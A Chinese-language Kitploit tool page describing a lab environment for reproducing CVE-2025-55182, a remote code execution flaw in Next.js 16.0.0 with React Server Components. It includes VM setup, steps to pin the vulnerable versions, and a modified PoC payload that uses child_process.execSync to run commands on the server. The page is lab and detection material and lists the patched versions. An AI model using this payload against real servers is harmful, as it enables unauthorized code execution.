Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
cve-2025-55182-poc-test — 可复现的实验室环境,演示针对 Next.js 16.0.0(使用 React Server Components)的 CVE-2025-55182 远程代码执行漏洞,包括外部漏洞利用执行和副作用验证。 | Kitploit
工具/GitHubGitHub/jandelima/cve-2025-55182-poc-test
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试学习与教育实验室与实践
GitHubjandelima/cve-2025-55182-poc-test

cve-2025-55182-poc-test

可复现的实验室环境,演示针对 Next.js 16.0.0(使用 React Server Components)的 CVE-2025-55182 远程代码执行漏洞,包括外部漏洞利用执行和副作用验证。

查看仓库
8个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2025-55182 演示实验室 (Next.js / React RSC RCE)

本文件提供了完整且可重现的设置,用于针对运行在 Multipass Ubuntu 虚拟机内的易受攻击的 Next.js + React Server Components 环境演示 CVE-2025-55182 远程代码执行 (RCE)。

利用程序从虚拟机外部执行,证明远程可利用性,并为异常行为检测准备环境。

来源:https://github.com/ejpir/CVE-2025-55182-research


1. 创建并准备 Ubuntu 虚拟机

2. 虚拟机内部的基本设置

2.1 更新系统并安装依赖

root@kitploit:~
sudo apt update && sudo apt upgrade -y
sudo apt install -y curl git build-essential

2.2 安装 Node.js LTS (20.x)

root@kitploit:~
curl -fsSL https://deb.nodesource.com/setup_20.x | sudo -E bash -
sudo apt install -y nodejs

验证:

root@kitploit:~
node -v
npm -v

2.3 为应用创建专用用户

root@kitploit:~
sudo adduser reactlab
sudo usermod -aG sudo reactlab
su - reactlab

3. 部署易受攻击的 Next.js 应用

3.1 创建工作目录

root@kitploit:~
mkdir ~/react2shell-lab
cd ~/react2shell-lab

3.2 生成极简的 Next.js App Router 项目

root@kitploit:~
npx create-next-app@latest vulnerable-app
cd vulnerable-app

3.3 固定易受攻击的版本在 package.json 中

编辑依赖项:

root@kitploit:~
"dependencies": {
  "next": "16.0.0",
  "react": "19.1.0",
  "react-dom": "19.1.0"
}

重新安装包:

root@kitploit:~
rm -rf node_modules package-lock.json
npm install

验证:

root@kitploit:~
npm list react react-dom next

预期输出:

root@kitploit:~
[email protected]
[email protected]
[email protected]

3.4 构建并以生产模式运行

root@kitploit:~
npm run build
npm start

预期输出:

root@kitploit:~
▲ Next.js 16.0.0
Local:   http://localhost:3000
Network: http://10.X.X.X:3000

start


4. 确认外部可访问性 (攻击者机器 → 虚拟机)

在另一台机器上:

root@kitploit:~
curl http://10.102.169.126:3000

您应该收到默认的 Next.js HTML 页面。


5. 在攻击者机器上克隆并测试 PoC

5.1 克隆仓库

root@kitploit:~
cd ~
git clone https://github.com/ejpir/CVE-2025-55182-research
cd CVE-2025-55182-research

5.2 将 PoC 指向服务器 IP

找到:

root@kitploit:~
hostname: 'localhost',

替换为:

root@kitploit:~
hostname: '10.X.X.X',

5.3 运行基础 PoC (简单 console.log RCE)

在 Next 仍在运行时:

root@kitploit:~
node test-simple.cjs

在 Next.js 终端中预期:

root@kitploit:~
NON-CHUNKED-RCE

这确认了使用易受攻击版本通过 React Flight 进行远程代码执行。

confirmed


6. 修改 PoC 以执行可见的副作用(文件创建)

目标是生成可观察的行为(文件系统 + 进程执行)。

6.1 编辑 test-simple.cjs 中的 _prefix

定位到:

root@kitploit:~
"_prefix": "console.log('NON-CHUNKED-RCE');//"

替换为:

root@kitploit:~
"_prefix": "process.mainModule.require('child_process').execSync('touch /tmp/cve-2025-55182-syscall');console.log('NON-CHUNKED-RCE');//"

注意:require 在执行上下文中不可用,但 process.mainModule.require() 可用。

6.2 测试修改后的利用程序

确保 Next 正在运行,然后:

root@kitploit:~
node test-simple.cjs

检查文件创建:

root@kitploit:~
ls -l /tmp/

您应该看到:

root@kitploit:~
cve-2025-55182-syscall

这确认了具有副作用的实用远程代码执行。

start


补丁:
React ≥ 19.2.1
Next.js ≥ 16.0.7

下载工具